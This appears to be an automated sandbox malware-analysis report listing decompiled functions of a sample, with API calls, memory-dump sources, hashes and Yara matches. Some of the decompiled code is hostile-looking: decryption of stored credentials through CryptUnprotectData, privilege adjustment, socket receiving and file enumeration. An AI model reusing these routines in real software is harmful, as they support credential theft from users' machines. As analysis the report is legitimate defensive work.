                                                                    • Opcode ID: 8308d737643fe2d3500817843970e65ce50674f473c6e71e3ecfc16b0b12823b
                                                                    • Instruction ID: 7dd6ea1d60364e9e3c861e9356440bedefc2bc545e76c98c19ef30f75a23a694
                                                                    • Opcode Fuzzy Hash: 8308d737643fe2d3500817843970e65ce50674f473c6e71e3ecfc16b0b12823b
                                                                    • Instruction Fuzzy Hash: D0318F71E00229ABCF15EBE4E5859AFB7B9EF94345F10406AD502B7380EB745E04CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A7A3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040A89B
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040A8A5
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040A8B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: acbb04395daa44992181811b2a2a5e27bab9f0f7b1aa0a99f232378e9ca52403
                                                                    • Instruction ID: 97881ca7debea6894f4bf05f1ab527d76a61141538de8bfb4ec4395a06f1f77d
                                                                    • Opcode Fuzzy Hash: acbb04395daa44992181811b2a2a5e27bab9f0f7b1aa0a99f232378e9ca52403
                                                                    • Instruction Fuzzy Hash: 2931D775D51318ABCB21DF64D8887DDBBB4AF18310F5081EAE80CA7291EB349F958F49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B15E Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E02D1B15E(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E02D11190(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E02D11052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E02D15EB4(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}














                                                                    0x02d1b15e
                                                                    0x02d1b166
                                                                    0x02d1b178
                                                                    0x02d1b17b
                                                                    0x02d1b18e
                                                                    0x02d1b1a9
                                                                    0x02d1b1b5
                                                                    0x02d1b1b8
                                                                    0x02d1b1be
                                                                    0x02d1b1c9
                                                                    0x02d1b1cd
                                                                    0x02d1b1d0
                                                                    0x02d1b1d3
                                                                    0x02d1b1df
                                                                    0x02d1b1e8
                                                                    0x02d1b1f4
                                                                    0x02d1b200

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,?,?,00000000,?,02D1AA4B,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 02D1B17B
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 02D1B1A9
                                                                      • Part of subcall function 02D15EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 02D1B1F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                                    • String ID:
                                                                    • API String ID: 573875632-0
                                                                    • Opcode ID: fbcc8ccc535ef9c81bde0395f6803ac7638555b5f641568fe2ac124f058c5bad
                                                                    • Instruction ID: b801ba4b5c09b92c0fc55dc5e5a7d7737f8513a9f7fcef7aaada5bf5935f22c2
                                                                    • Opcode Fuzzy Hash: fbcc8ccc535ef9c81bde0395f6803ac7638555b5f641568fe2ac124f058c5bad
                                                                    • Instruction Fuzzy Hash: 9811D6B6D0020DAFCB11DF94D8849EEBBBDEF58344F10456AE909A3200D7359E55CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F619 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E02D1F619(void* __ecx, WCHAR** __edx) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				WCHAR** _t33;

				asm("stosd");
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t33 = __edx;
				asm("movlpd [ebp-0x10], xmm0");
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
					L4:
					return 0;
				} else {
					_v36.Privileges = _v20.LowPart;
					_v28 = _v20.HighPart;
					_v36.PrivilegeCount = 1;
					_v24 = 2;
					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
						goto L4;
					}
					return 1;
				}
			}











                                                                    0x02d1f627
                                                                    0x02d1f62a
                                                                    0x02d1f62d
                                                                    0x02d1f630
                                                                    0x02d1f632
                                                                    0x02d1f637
                                                                    0x02d1f63a
                                                                    0x02d1f63b
                                                                    0x02d1f63c
                                                                    0x02d1f64c
                                                                    0x02d1f698
                                                                    0x00000000
                                                                    0x02d1f65f
                                                                    0x02d1f665
                                                                    0x02d1f66e
                                                                    0x02d1f678
                                                                    0x02d1f683
                                                                    0x02d1f692
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f694

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,02D1E18E), ref: 02D1F644
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 02D1F655
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 02D1F68A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                                    • String ID:
                                                                    • API String ID: 658607936-0
                                                                    • Opcode ID: 6276d526daf2ce481985b7a94cd8e086053ef3fd75d7050b23eb3dead10f2f38
                                                                    • Instruction ID: 1bd4177fe41836c07d44aa30f3c6fd0c0e8adc6d6dfd35c6386098d5b1a07ccc
                                                                    • Opcode Fuzzy Hash: 6276d526daf2ce481985b7a94cd8e086053ef3fd75d7050b23eb3dead10f2f38
                                                                    • Instruction Fuzzy Hash: 3511DD75E10219BFEB11CFA5DD449EFF7BCFB48644F10492AE901F2650E7709A449BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CAFC Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E02D1CAFC(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
				void* _v8;
				long _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _t16;
				void* _t18;
				long _t23;
				char* _t26;

				_v24 = __ecx;
				_v28 = __edx;
				_v20 = 0;
				_t16 =  &_v28;
				_v16 = 0;
				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12);
				_t26 = _t16;
				if(_t26 != 0) {
					_t23 = _v12;
					_t27 = _a28;
					 *_a28 = _t23;
					_t18 = LocalAlloc(0x40, _t23);
					 *_a24 = _t18;
					if(_t18 != 0) {
						E02D1102C(_t18, _v8,  *_t27);
					}
					LocalFree(_v8);
				}
				return _t26;
			}













                                                                    0x02d1cb07
                                                                    0x02d1cb10
                                                                    0x02d1cb18
                                                                    0x02d1cb1d
                                                                    0x02d1cb20
                                                                    0x02d1cb24
                                                                    0x02d1cb2a
                                                                    0x02d1cb2e
                                                                    0x02d1cb30
                                                                    0x02d1cb33
                                                                    0x02d1cb39
                                                                    0x02d1cb3b
                                                                    0x02d1cb44
                                                                    0x02d1cb48
                                                                    0x02d1cb50
                                                                    0x02d1cb55
                                                                    0x02d1cb5b
                                                                    0x02d1cb5b
                                                                    0x02d1cb66

                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 02D1CB24
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,02D1CAD5,?,00000000,?,?,?,?,02D1CA44), ref: 02D1CB3B
                                                                    • LocalFree.KERNEL32(02D1CAD5,?,?,?,?,?,02D1CAD5,?,00000000,?,?,?,?,02D1CA44), ref: 02D1CB5B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                    • String ID:
                                                                    • API String ID: 2068576380-0
                                                                    • Opcode ID: 7b029f0a25001e512dd3abfa5dc25ca81007bff70380ebcfe2f4c8814acb50fe
                                                                    • Instruction ID: f43bc126973a2c36dcbfb9f262bbce4b957b63deff8eb40fb94881a583878fbe
                                                                    • Opcode Fuzzy Hash: 7b029f0a25001e512dd3abfa5dc25ca81007bff70380ebcfe2f4c8814acb50fe
                                                                    • Instruction Fuzzy Hash: 810108B9D40219AFDB159FA4DD0A8AEBBB9EF58211F10056AED41A2340E7719E14CAA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406750 Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadResource.KERNEL32(?,?,?,?,00402F3C,00000000,00000000,?), ref: 0040675A
                                                                    • LockResource.KERNEL32(00000000,?,?,00402F3C,00000000,00000000,?), ref: 00406765
                                                                    • SizeofResource.KERNEL32(?,?,?,?,00402F3C,00000000,00000000,?), ref: 00406777
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$LoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 2853612939-0
                                                                    • Opcode ID: c6e0ba34dba859eb0b8b5e3138f23bf24e73977bfbefe1b4d9aeda50dd6975e8
                                                                    • Instruction ID: c06dce4dc857c0e570c8498c03582b8fa6d5feab43adc6a9aec76e99dee71805
                                                                    • Opcode Fuzzy Hash: c6e0ba34dba859eb0b8b5e3138f23bf24e73977bfbefe1b4d9aeda50dd6975e8
                                                                    • Instruction Fuzzy Hash: C6F028369002299FCF315F64DC044AA7BA4EB847553038836FD0FB3150E639DC6087C4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C40E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,0040C40D,00000000,00000000,?,00000000,?,0040E3E2), ref: 0040C430
                                                                    • TerminateProcess.KERNEL32(00000000,?,0040C40D,00000000,00000000,?,00000000,?,0040E3E2), ref: 0040C437
                                                                    • ExitProcess.KERNEL32 ref: 0040C449
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 042ef01185758883035417fadbcf2aea06edea07491480b2c52b3dd25f90e22b
                                                                    • Instruction ID: 2ee7d6a30e1c9f2ea0b7c0948b6f3c6d58c915f4f7fb98a82b557b981973ad99
                                                                    • Opcode Fuzzy Hash: 042ef01185758883035417fadbcf2aea06edea07491480b2c52b3dd25f90e22b
                                                                    • Instruction Fuzzy Hash: 96E0B631410608EFCF126B65DC699A93B69FB41341B548539F805A6272CB3DED82DA98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040FD34 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: 4614c3ac16b0df14dcfa035dcd81d49b6d282607c3f7d11ebf436ff1b6696e4c
                                                                    • Instruction ID: 113bd5d612662efda5db9b2d70b720d05c4466db24c2acdae4581605959f948c
                                                                    • Opcode Fuzzy Hash: 4614c3ac16b0df14dcfa035dcd81d49b6d282607c3f7d11ebf436ff1b6696e4c
                                                                    • Instruction Fuzzy Hash: 9C3137719001086FDB24DE69CC84EFB776EDF45318F1401BEE509A7692E638AD498B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F23D Relevance: 3.1, APIs: 2, Instructions: 104networkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E02D1F23D(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t26;
				void* _t28;
				void* _t30;
				signed int* _t31;
				signed int _t39;
				signed int* _t42;
				void* _t44;
				void* _t54;
				void* _t56;
				signed int* _t58;
				void* _t59;
				void* _t60;

				_t26 =  *0x2d298b4; // 0x0
				_v16 = _t26;
				_v8 = E02D11085(0x2000);
				_t28 = E02D11085(0x2000);
				_t58 = _a4;
				_t44 = _t28;
				_v20 = _v20 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t54 = 0;
				while(1) {
					_t30 = 8;
					_t31 = _t30 - _t54;
					__imp__#16(_v16, _t44, _t31, 0);
					_a4 = _t31;
					if(_t31 == 0 || _t31 == 0xffffffff) {
						break;
					}
					E02D1102C(_v8 + _t54, _t44, _t31);
					_t54 = _t54 + _a4;
					_t59 = _t59 + 0xc;
					if(_t54 < 8) {
						continue;
					} else {
						_t55 = _v8;
						E02D1102C( &_v20, _v8, 4);
						E02D1102C( &_v12, _t55 + 4, 4);
						_t39 = _v12;
						_t60 = _t59 + 0x18;
						_t56 = 0;
						if(_t39 <= 0) {
							L8:
							_t58[1] = _t39;
							 *_t58 = _v20;
							_t58[2] = _v8;
							E02D11099(_t44);
						} else {
							while(1) {
								_t42 = _t39 - _t56;
								__imp__#16(_v16, _t44, _t42, 0);
								_a4 = _t42;
								if(_t42 == 0 || _t42 == 0xffffffff) {
									goto L9;
								}
								E02D1102C(_v8 + _t56, _t44, _t42);
								_t56 = _t56 + _a4;
								_t60 = _t60 + 0xc;
								_t39 = _v12;
								if(_t56 < _t39) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							break;
						}
					}
					L10:
					return _t58;
				}
				L9:
				 *0x2d29695 = 0;
				goto L10;
			}



















                                                                    0x02d1f243
                                                                    0x02d1f250
                                                                    0x02d1f25a
                                                                    0x02d1f25d
                                                                    0x02d1f262
                                                                    0x02d1f265
                                                                    0x02d1f267
                                                                    0x02d1f26d
                                                                    0x02d1f275
                                                                    0x02d1f276
                                                                    0x02d1f277
                                                                    0x02d1f278
                                                                    0x02d1f27a
                                                                    0x02d1f27e
                                                                    0x02d1f27f
                                                                    0x02d1f286
                                                                    0x02d1f28c
                                                                    0x02d1f291
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f2a8
                                                                    0x02d1f2ad
                                                                    0x02d1f2b0
                                                                    0x02d1f2b6
                                                                    0x00000000
                                                                    0x02d1f2b8
                                                                    0x02d1f2b8
                                                                    0x02d1f2c2
                                                                    0x02d1f2d1
                                                                    0x02d1f2d6
                                                                    0x02d1f2d9
                                                                    0x02d1f2dc
                                                                    0x02d1f2e0
                                                                    0x02d1f317
                                                                    0x02d1f31a
                                                                    0x02d1f321
                                                                    0x02d1f323
                                                                    0x02d1f326
                                                                    0x02d1f2e2
                                                                    0x02d1f2e2
                                                                    0x02d1f2e4
                                                                    0x02d1f2eb
                                                                    0x02d1f2f1
                                                                    0x02d1f2f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f305
                                                                    0x02d1f30a
                                                                    0x02d1f30d
                                                                    0x02d1f310
                                                                    0x02d1f315
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f315
                                                                    0x00000000
                                                                    0x02d1f2e2
                                                                    0x02d1f2e0
                                                                    0x02d1f336
                                                                    0x02d1f33b
                                                                    0x02d1f33b
                                                                    0x02d1f32e
                                                                    0x02d1f32e
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • recv.WS2_32(?,00000000,00000008,00000000), ref: 02D1F286
                                                                    • recv.WS2_32(?,00000000,00000000,00000000), ref: 02D1F2EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heaprecv$AllocateProcess
                                                                    • String ID:
                                                                    • API String ID: 3872517900-0
                                                                    • Opcode ID: 6dcd16d9dafdc28eb318558ffe5b045bc8bb3aa85e18b147d6eb2292a5f6024b
                                                                    • Instruction ID: bcd5a64e95d9b487e479081f487145b6d574511b611dbe0557adbdd7850e2f34
                                                                    • Opcode Fuzzy Hash: 6dcd16d9dafdc28eb318558ffe5b045bc8bb3aa85e18b147d6eb2292a5f6024b
                                                                    • Instruction Fuzzy Hash: 053192B1E00209BFEB209BB8EC44B9E7BA9EF44354F244515E658E7790D734DE40CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1FF27 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E02D1FF27(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v56;
				struct _WIN32_FIND_DATAW _v648;
				intOrPtr _t39;
				void* _t62;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E02D11875( &_v28, __eflags);
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;
				while(_t79 != 0) {
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");
						_v40 = 1;
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E02D13437( &_v56, E02D135E5( &_v12,  &(_v648.cFileName)));
					E02D15EA5(_v12);
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;
					_t76 = _t77;
					E02D1362D(_t76,  &_v56);
					 *((intOrPtr*)(_t76 + 8)) = _v48;
					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
					 *(_t76 + 0x10) = _v40;
					E02D11776( &_v28);
					E02D15EA5(_v56);
					__eflags = FindNextFileW(_t62,  &_v648);
				}
				E02D11361(_t75, _t79,  &_v28);
				_t73 = _v28;
				if(_v28 != 0) {
					E02D11AD5(_t73, _t73);
				}
				E02D15EA5(_a4);
				return _t75;
			}



















                                                                    0x02d1ff30
                                                                    0x02d1ff39
                                                                    0x02d1ff3a
                                                                    0x02d1ff3c
                                                                    0x02d1ff42
                                                                    0x02d1ff45
                                                                    0x02d1ff5a
                                                                    0x02d1ff5c
                                                                    0x02d1fffe
                                                                    0x02d1ff64
                                                                    0x02d1ff68
                                                                    0x02d1ff6f
                                                                    0x02d1ff8e
                                                                    0x02d1ff8e
                                                                    0x02d1ff8e
                                                                    0x02d1ff92
                                                                    0x02d1ff95
                                                                    0x02d1ff71
                                                                    0x02d1ff71
                                                                    0x02d1ff74
                                                                    0x02d1ff7b
                                                                    0x02d1ff7b
                                                                    0x02d1ffab
                                                                    0x02d1ffb3
                                                                    0x02d1ffb8
                                                                    0x02d1ffbf
                                                                    0x02d1ffc2
                                                                    0x02d1ffc7
                                                                    0x02d1ffd2
                                                                    0x02d1ffd8
                                                                    0x02d1ffde
                                                                    0x02d1ffe1
                                                                    0x02d1ffe9
                                                                    0x02d1fffc
                                                                    0x02d1fffc
                                                                    0x02d2000a
                                                                    0x02d2000f
                                                                    0x02d20014
                                                                    0x02d20017
                                                                    0x02d20017
                                                                    0x02d2001f
                                                                    0x02d2002a

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 02D1FF54
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 02D1FFF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 0cb732a7809ff1356e5999c785b8c6b7bdd43b3b09d6ca80a067481110f4501a
